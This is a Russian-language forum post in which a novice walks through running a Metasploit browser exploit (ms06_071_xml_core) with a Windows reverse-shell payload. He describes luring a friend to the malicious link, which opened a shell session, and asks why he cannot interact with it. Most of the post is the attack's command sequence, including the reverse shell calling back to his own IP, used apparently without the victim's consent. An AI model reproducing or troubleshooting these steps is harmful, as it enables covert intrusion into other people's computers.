я короче решил поюзать metasploit. я никак не могу подключиться к cmd жертвы! вроде бы я все делаю правильно. короче сейчас все поясню: 1.вот я запустил metasploit 3.4.0 2.пишу show и выходит список всех эксплоитов 3.теперь я запускаю один из эксплоитов. use windows/browser/ms06_071_xml_core 4.выбрал сплоит. команда use удачно выполнилась 5.смотрю инфу сплоита: пишу команду info 6.далее присваиваю значение переменной set LHOST и пишу свой РЕАЛЬНЫЙ ip адрес. 7.вроде бы установка идет и я выбираю реверсшелл. 8.пишу в консоле set PAYLOAD windows/shell_reverse_tcp 9.тут мне в инфе понравилась команда URIPATH и я решил изменить название страницы вместо стандартного 10.0.0.2 10.написал другое название. 11.все. дальше я запускаю свой эксплойт. командой exploits 12.впарил ссылку другу и вылетает у меня окно command shell session 1 opened(10.0.0.1:4444->10.0.0.2:1548) 13. открыл сессию. а дальше?? а дальше я жму на энтр и пишу session -i 1и вроде бы должен подконектиться а он вместо этого пишет вот что invalid session identifier: 1 и все и вот весь мой сплоит. и короче я не могу конект сделать. 14.может поможет кто?? может я чтото неправильно сделал??